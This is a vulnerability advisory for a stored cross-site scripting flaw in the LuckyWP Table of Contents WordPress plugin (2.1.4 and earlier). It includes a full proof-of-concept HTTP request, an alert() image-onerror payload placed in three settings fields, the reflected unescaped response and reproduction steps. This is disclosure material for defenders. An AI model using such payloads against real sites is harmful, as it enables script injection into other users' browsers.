Lucene search

Sławomir Zakrzewski, Maksymilian Kubiak (AFINE)WPEX-ID:ECD615F7-946E-45AF-A610-0654A243B1DC

HistoryMay 24, 2024 - 12:00 a.m.

LuckyWP Table of Contents <= 2.1.4 - Admin+ Stored XSS

2024-05-2400:00:00

Sławomir Zakrzewski, Maksymilian Kubiak (AFINE)

luckywp table of contents

stored xss

vulnerability

plugin

update

poc

exploit

admin

5.6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

JSON

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

Request:

POST /wordpress/wp-admin/options.php HTTP/1.1
Host: localhost:8888
Content-Length: 854
Origin: http://localhost:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost:8888/wordpress/wp-admin/options-general.php?page=lwptoc_settings&tab=general
Cookie: wordpress_2b7738476b2cfaf3b5454b1e89821e63=admin%7C1708766444%7C0GzMU59sZAvkYhj8ehqGOkvfh3o3aydrJhg1ZMemE1P%7C22974de7e91d95312e8cefa5f5c339f1696e50a12ec00e68ab0488447c2cafbf; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=pl_PL; wordpress_logged_in_2b7738476b2cfaf3b5454b1e89821e63=admin%7C1708766444%7C0GzMU59sZAvkYhj8ehqGOkvfh3o3aydrJhg1ZMemE1P%7C2d06dac1007e1bc6a183a19f4f01d66fecd7b809d5785a7974a3edc1a0dca85d; wp-settings-1=libraryContent%3Dupload%26editor%3Dhtml%26post_dfw%3Doff%26posts_list_mode%3Dlist; wp-settings-time-1=1708593645
Connection: close

option_page=lwptoc_general&action=update&_wpnonce=e60641c07f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dlwptoc_settings%26tab%3Dgeneral&lwptoc_general%5Bmin%5D=&lwptoc_general%5Bdepth%5D=6&lwptoc_general%5Bhierarchical%5D=0&lwptoc_general%5Bhierarchical%5D=1&lwptoc_general%5Bnumeration%5D=decimalnested&lwptoc_general%5BnumerationSuffix%5D=none&lwptoc_general%5Btitle%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&lwptoc_general%5Btoggle%5D=0&lwptoc_general%5Btoggle%5D=1&lwptoc_general%5BlabelShow%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%282%29%3E&lwptoc_general%5BlabelHide%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&lwptoc_general%5BhideItems%5D=0&lwptoc_general%5BhideItems%5D=1&lwptoc_general%5BsmoothScroll%5D=0&lwptoc_general%5BsmoothScroll%5D=1&lwptoc_general%5BsmoothScrollOffset%5D=&submit=Zapisz+zmiany


Response:

HTTP/1.1 200 OK
Server: nginx/1.19.2
Date: Thu, 22 Feb 2024 09:42:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.33
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Content-Length: 48359

[...]

<td><input class="js-lwptocToggleEl regular-text" type="text" name="lwptoc_general[labelShow]" value=""><img src=x onerror=alert(2)>"></input></td></tr><tr><th scope="row">Label Hide</th>

<td><input class="js-lwptocToggleEl regular-text" type="text" name="lwptoc_general[labelHide]" value=""><img src=x onerror=alert(3)>"></input></td>

<td><input class="regular-text" type="text" name="lwptoc_general[title]" value=""><img src=x onerror=alert(1)>"></input></td>

[...]

1. Go to the plugin's settings.
2. Insert the following payload into the Title, Label Show, and Label Hide fields: "><img src=x onerror=alert(1)>
3. Add the Table of Contents to a post/page using the Block Editor.
4. The alert will trigger.